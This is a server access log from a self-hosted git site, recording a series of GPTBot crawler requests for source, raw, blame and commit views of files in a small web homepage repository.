"https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:13:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 11030] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" -[17/Feb/2026:13:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" [Client 74.7.227.38] [Length 9911] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" [Client 74.7.227.38] [Length 10577] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" [Client 74.7.227.38] [Length 9976] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 11485] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 11892] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 11610] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 11024] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" -[17/Feb/2026:13:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" -[17/Feb/2026:13:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 11852] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" -[17/Feb/2026:13:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" -[17/Feb/2026:13:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" -[17/Feb/2026:13:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 10781] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" -[17/Feb/2026:13:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 10731] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" -[17/Feb/2026:13:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" -[17/Feb/2026:13:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 10828] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" -[17/Feb/2026:13:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" -[17/Feb/2026:13:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 10353] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" -[17/Feb/2026:13:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 11186] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" -[17/Feb/2026:13:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 11208] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" -[17/Feb/2026:13:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" -[17/Feb/2026:13:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" -[17/Feb/2026:13:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" -[17/Feb/2026:13:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" -[17/Feb/2026:13:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" -[17/Feb/2026:13:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" -[17/Feb/2026:13:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" -[17/Feb/2026:13:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" -[17/Feb/2026:13:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 11669] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 31009] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" -[17/Feb/2026:13:07:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" -[17/Feb/2026:13:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" -[17/Feb/2026:13:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 11057] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 10351] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" -[17/Feb/2026:13:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 11184] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" -[17/Feb/2026:13:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 11838] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 10953] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" -[17/Feb/2026:13:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:13:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 10326] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:13:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" -[17/Feb/2026:13:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 41653] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:13:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" -[17/Feb/2026:13:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 9985] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:13:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" -[17/Feb/2026:13:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 12445] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" -[17/Feb/2026:13:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" -[17/Feb/2026:13:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" -[17/Feb/2026:13:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 11358] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" -[17/Feb/2026:13:07:20 